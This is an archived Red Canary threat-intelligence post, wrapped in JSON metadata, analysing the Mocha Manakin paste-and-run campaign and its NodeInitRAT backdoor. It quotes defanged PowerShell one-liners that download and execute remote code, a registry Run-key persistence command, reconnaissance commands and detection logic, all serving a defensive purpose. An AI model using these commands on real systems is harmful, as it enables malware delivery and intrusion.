{ "id": "f7869a6a-5c45-48ea-83a9-870beaafbe3e", "created_at": "2026-04-06T00:08:29.285431Z", "updated_at": "2026-04-10T03:36:18.963581Z", "deleted_at": null, "sha1_hash": "8228bb6af437f81c8240f10bee7bd5be550f1329", "title": "Mocha Manakin delivers custom NodeJS backdoor via paste and run | Red Canary", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 107381, "plain_text": "Mocha Manakin delivers custom NodeJS backdoor via paste and\r\nrun | Red Canary\r\nBy chris.brook@redcanary.com\r\nArchived: 2026-04-05 18:53:18 UTC\r\nMocha Manakin delivers custom NodeJS backdoor via paste and run\r\nThe newest Red Canary color bird threat employs paste and run with PowerShell to drop a custom NodeJS\r\nbackdoor that could lead to ransomware\r\nOriginally published June 18, 2025. Last modified July 15, 2025.\r\nWhat is Mocha Manakin?\r\nWe started tracking Mocha Manakin activity in January 2025, one of several activity clusters we’ve observed\r\nleveraging paste and run as the initial access technique. Paste and run (aka Clickfix, fakeCAPTCHA) is an initial\r\naccess technique that tricks users into executing a script that downloads follow-on payloads from adversary\r\ninfrastructure. We’ve observed a number of payloads delivered following successful paste and run execution,\r\nincluding LummaC2, HijackLoader, Vidar, and more.\r\nMocha Manakin is distinct from other paste and run activity because it is followed by a bespoke NodeJS-based\r\nbackdoor that we have named NodeInitRAT. NodeInitRAT allows the adversary to establish persistence and\r\nperform reconnaissance activities, such as enumerating principal names and gathering domain details.\r\nNodeInitRAT communicates with adversary-controlled servers over HTTP, often through Cloudflare tunnels\r\nhttps://redcanary.com/blog/threat-intelligence/mocha-manakin-nodejs-backdoor/\r\nPage 1 of 8\n\nacting as intermediary infrastructure. The backdoor is capable of issuing arbitrary commands and deploying\r\nadditional payloads on compromised systems.\r\nMocha Manakin has overlaps in activity related to Interlock ransomware, as reported by Sekoia.io. Specifically:\r\nthe use of paste and run for initial access\r\nfollow-on delivery of the NodeJS remote access trojan we call NodeInitRAT\r\nsome of the same infrastructure\r\nAs of May 2025, Red Canary has not directly observed Mocha Manakin activity progress to ransomware.\r\nHowever, we assess with moderate confidence that unmitigated Mocha Manakin activity will likely lead to\r\nransomware.\r\nMocha Manakin TTPs\r\nInitial access: Paste and run\r\nMocha Manakin gains initial access by using paste and run. Since we started tracking it in August 2024, paste and\r\nrun remains a popular method of initial execution and has increased in scope and scale. The increased use of paste\r\nand run is due to its ongoing effectiveness; paste-and-run lures are highly effective at tricking users into executing\r\nmalicious scripts on their endpoints. There are many ways to distribute paste-and-run lures, from phishing to web\r\nbrowser injects, meaning there are many opportunities for adversaries to present lures to users.\r\nThere are two main styles of paste-and-run lures:\r\nThe user has to “fix” their access to a document, website, or software installation/update by following the\r\ninstructions in the paste and run lure.\r\nA CAPTCHA-style lure prompting the user to follow given instructions to prove they are a human, also to\r\ngain access to a document, website, or installation/update process.\r\nOnce the users interact with the Fix or Verify button in the lure, the button will covertly copy an obfuscated\r\nPowerShell command to the clipboard and present the user with “verification steps,” which typically consist of\r\nrunning a shortcut to open the run dialog, pasting the copied PowerShell command, and pushing enter. By\r\nfollowing the “verification steps,” the user inadvertently runs the command.\r\nMocha Manakin’s paste-and-run commands have gone through several iterations, for example:\r\nDate seen Command\r\nhttps://redcanary.com/blog/threat-intelligence/mocha-manakin-nodejs-backdoor/\r\nPage 2 of 8\n\nDate seen Command\r\nDate seen:\r\nJanuary 2025\r\nCommand:\r\npowershell -NoProfile -Command \"$r=iwr\r\n'hxxps://pub-motorola-viking-charger[.]trycloudflare[.]com\r\n/12341234'-UseBasicParsing;$s=[Text.Encoding]::UTF8.GetStr\r\ning($r.Content);iex $s\"\r\nDate seen:\r\nJanuary \u0026 February 2025\r\nCommand:\r\npowershell -noprofile -w H -c \"$r=iwr\r\nhxxps://pilot-agent-false-taken[.]trycloudflare[.]com/clou\r\ndfla -h @{ 'X-Computer-Name'=$env:COMPUTERNAME\r\n};$s=[Text.Encoding]::Utf8.GetString($r.Content);iex $s\"\r\nDate seen:\r\nApril 2025\r\nCommand:\r\n\"C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe\r\n\" -w h -c \"iex $(irm 138.199.156[.]22:8080/$($z =\r\n[datetime]::UtcNow; $y = ([datetime]('01/01/' + '1970'));\r\n$x = ($z - $y).TotalSeconds; $w = [math]::Floor($x); $v =\r\n$w - ($w % 16); [int64]$v))\"\r\nThese commands will reach out to the adversary command and control and download malware or tools—in\r\nMocha Manakin’s case, NodeInitRAT.\r\nPayload: NodeInitRAT\r\nWhen successfully executed, Mocha Manakin’s paste-and-run PowerShell command will reach out to the URL in\r\nthe command line and execute a PowerShell loader. The PowerShell loader downloads a .zip file containing a\r\nlegitimate portable node.exe binary. It extracts the ZIP archive and executes NodeInitRAT by running\r\nnode.exe  with the contents of NodeInitRAT passed via the command line.\r\nhttps://redcanary.com/blog/threat-intelligence/mocha-manakin-nodejs-backdoor/\r\nPage 3 of 8\n\nNodeInitRAT in node.exe  command line\r\nOnce NodeInitRAT is installed on a system, it can go on to perform a number of actions:\r\nEstablish persistence using a Windows Registry run key\r\nPerform system and domain reconnaissance\r\nCommunicate with adversary-controlled servers over HTTP, commonly using Cloudflare tunnels as\r\nintermediary infrastructure; the communications occur via HTTP POST requests to the remote host with a\r\nURL path ending in /init1234 .\r\nIssue arbitrary commands:\r\nWe observed commands to execute nltest , net.exe , and setspn.exe  to gather lists of domain\r\ncontrollers \u0026 domain trusts, enumerate domain admin accounts, and enumerate Service Principal\r\nNames respectively\r\nDeploy EXE, DLL, and JS payloads on affected systems\r\nUse XOR encoding and GZIP compression to minimize data transferred and protect it from cursory\r\ninspection\r\nSimilar activity has also been observed by other researchers.\r\nThe following table displays some NodeInitRAT commands and what they do:\r\nNodeInitRAT command Description of activity\r\nhttps://redcanary.com/blog/threat-intelligence/mocha-manakin-nodejs-backdoor/\r\nPage 4 of 8\n\nNodeInitRAT command Description of activity\r\nNodeInitRAT command:\r\nreg add\r\n\"HKCU\\Software\\Microsoft\\Windows\\Cu\r\nrrentVersion\\Run\" /v\r\n\"ChromeUpdater\" /t REG_SZ /d\r\n\"C:\\users[redacted]\\AppData\\Roaming\r\n\\node-v22.11.0-win-x64\\node.exe\r\nC:\\users[redacted]\\AppData\\Roaming\\\r\nnode-v22.11.0-win-x64\\2fbjs1z6.log\"\r\n/f\"\r\nDescription of activity:\r\nEstablish persistence using a Windows Registry run key. As of\r\nApril 2025, the run key is usually named “ChromeUpdater”.\r\nNodeInitRAT command:\r\nsysinfo\r\nDescription of activity:\r\nDiscover the affected system’s system information\r\nNodeInitRAT command:\r\narp.exe -a\r\nDescription of activity:\r\nDiscover the affected system’s local network neighbors using\r\nARP\r\nNodeInitRAT command:\r\ntasklist.exe /svc\r\nDescription of activity:\r\nDiscover the affected system’s currently executing processes and\r\nany services\r\nNodeInitRAT command:\r\npowershell.exe -c Get-Service\r\nDescription of activity:\r\nDiscover the affected system’s services\r\nNodeInitRAT command:\r\npowershell.exe -c \"chcp 65001 \u003e\r\n$null 2\u003e\u00261 ; echo 'version: 000010'\r\n; if\r\n([Security.Principal.WindowsIdentit\r\ny]::GetCurrent().Name -match\r\n'(?i)SYSTEM') { 'Runas: System' }\r\nelseif\r\n(([Security.Principal.WindowsPrinci\r\npal]\r\n[Security.Principal.WindowsIdentity\r\nDescription of activity:\r\nDiscover the current user’s level of privilege using PowerShell\r\nhttps://redcanary.com/blog/threat-intelligence/mocha-manakin-nodejs-backdoor/\r\nPage 5 of 8\n\nNodeInitRAT command Description of activity\r\n]::GetCurrent()).IsInRole([Security\r\n.Principal.WindowsBuiltInRole]::Adm\r\ninistrator)) { 'Runas: Admin' }\r\nelse { 'Runas: User' } ; systeminfo\r\n; echo '=-=-=-=-=-' ; tasklist /svc\r\n; echo '=-=-=-=-=-' ; Get-Service |\r\nSelect-Object -Property Name,\r\nDisplayName | Format-List ; echo\r\n'=-=-=-=-=-' ; Get-PSDrive\r\n-PSProvider FileSystem |\r\nFormat-Table ; echo '=-=-=-=-=-' ;\r\narp -a\"\r\nNodeInitRAT command:\r\ncmd.exe /d /s /c \"net user\r\n%USERNAME% /domain\"\r\nDescription of activity:\r\nExecute arbitrary commands using cmd.exe\r\nNodeInitRAT command:\r\nC:\\Users\\[redacted]\\AppData\\Roaming\r\n\\[a-z0-9]{8}.log\r\nNote: extension will vary by file type\r\nDescription of activity:\r\nDownload and execute arbitrary EXE, DLL, CMD, and JS files.\r\nIn some cases, the JS files may be renamed with .LOG\r\nextensions\r\nNodeInitRAT command:\r\nrundll32.exe\r\nC:\\Users\\[redacted]\\AppData\\Roaming\r\n\\[a-z0-9]{8}.dll,start\r\nDescription of activity:\r\nDeploy subsequent payloads in DLL form and execute the DLLs\r\nusing rundll32.exe\r\nTakeaways for defenders\r\nSince Mocha Manakin and NodeInitRAT have overlaps with Interlock-ransomware-related activity, it is important\r\nto detect and remediate this threat as early as possible.\r\nIts use of paste and run is both a boon and a challenge to defenders; a boon because it is a well-known and\r\nestablished technique, and a challenge since it is hard to mitigate. One mitigation strategy for the Windows variant\r\nis implementing a GPO disabling Windows hotkeys, preventing paste and run’s use of Windows+R or\r\nWindows+X, but as this is a popular feature with users, it does not seem to have been widely adopted by\r\nhttps://redcanary.com/blog/threat-intelligence/mocha-manakin-nodejs-backdoor/\r\nPage 6 of 8\n\nenterprises. Another mitigation strategy is employee education to alert users to adversaries’ strategies that take\r\nadvantage of their digital conditioning.\r\nTo mitigate NodeInitRAT, stop any relevant node.exe  processes that are executing the malware. The RAT code\r\nitself is passed into node.exe via the command line, but a persistent copy of the code may exist in files matching\r\nthe path pattern \\AppData\\Roaming\\[a-z0-9]{8}.log . Deleting the persistent files and any Windows Registry run\r\nkeys should stop persistent execution. In the event that NodeInitRAT also drops additional files such as DLLs, we\r\nalso recommend removing those from disk.\r\nIf you discover an instance of NodeInitRAT, you can also take steps to block network communications. Any\r\ndomains found in NodeInitRAT command lines can be sinkholed to prevent communication, and any IPs\r\nreferenced in the command lines can be added to firewall rules to block communication. In many cases of\r\nNodeInitRAT, we observed command and control domains using trycloudflare[.]com , a URL that’s part of the\r\nlegitimate Cloudflare tunnel service. Hunting for these domains across network traffic and DNS requests may\r\nyield NodeInitRAT and other malware families.\r\nDetection opportunity: PowerShell using invoke-expression and invoke-restmethod  to\r\ndownload content at a remote IP address\r\nThe following pseudo-detection analytic identifies instances of PowerShell using invoke-expression  and\r\ninvoke-restmethod to download content at a remote IP address. Adversaries can use this function to download\r\nremotely hosted scripts, as seen in some versions of Mocha Manakin’s paste and run commands. Note that some\r\nutilities like chocolately  or chef  use these functions legitimately.\r\nprocess == ('powershell')\r\n\u0026\u0026\r\ndeobfuscated_command_includes ('irm' || 'invoke-restmethod')\r\n\u0026\u0026\r\ndeobfuscated_command_includes ('iex' || 'invoke-expression')\r\n\u0026\u0026\r\ndeobfuscated_command_includes (IP address)\r\n\u0026\u0026\r\ndeobfuscated_command_excludes (approved IP address)\r\nDetection opportunity: Instances of NodeJS spawning the Command Processor to add a registry\r\nkey\r\nThe following pseudo-detection analytic identifies instances of NodeJS, node.exe , spawning the Command\r\nProcessor, cmd.exe , to add a registry key. NodeJS-based remote access trojans (RATs), including NodeInitRAT,\r\ncan use Windows Registry keys to establish persistence on a system. While normal behavior for node.exe\r\nincludes spawning instances of cmd.exe , creating registry run  keys with those instances is not.\r\nparent_process == ('node.exe')\r\n\u0026\u0026\r\nhttps://redcanary.com/blog/threat-intelligence/mocha-manakin-nodejs-backdoor/\r\nPage 7 of 8\n\nprocess == ('cmd')\r\n\u0026\u0026\r\ndeobfuscated_command_includes ('reg add' || 'run')\r\nLOOK FAMILIAR?\r\nRelated Articles\r\nSubscribe to our blog\r\nYou'll receive a weekly email with our new blog posts.\r\nSource: https://redcanary.com/blog/threat-intelligence/mocha-manakin-nodejs-backdoor/\r\nhttps://redcanary.com/blog/threat-intelligence/mocha-manakin-nodejs-backdoor/\r\nPage 8 of 8", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia" ], "references": [ "https://redcanary.com/blog/threat-intelligence/mocha-manakin-nodejs-backdoor/" ], "report_names": [ "mocha-manakin-nodejs-backdoor" ], "threat_actors": [ { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "210b80c4-7d21-49a2-b199-b7c3c75dfb1c", "created_at": "2026-02-03T02:00:03.440751Z", "updated_at": "2026-04-10T02:00:03.940412Z", "deleted_at": null, "main_name": "Mocha Manakin", "aliases": [], "source_name": "MISPGALAXY:Mocha Manakin", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434109, "ts_updated_at": 1775792178, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/8228bb6af437f81c8240f10bee7bd5be550f1329.pdf", "text": "https://archive.orkl.eu/8228bb6af437f81c8240f10bee7bd5be550f1329.txt", "img": "https://archive.orkl.eu/8228bb6af437f81c8240f10bee7bd5be550f1329.jpg" } }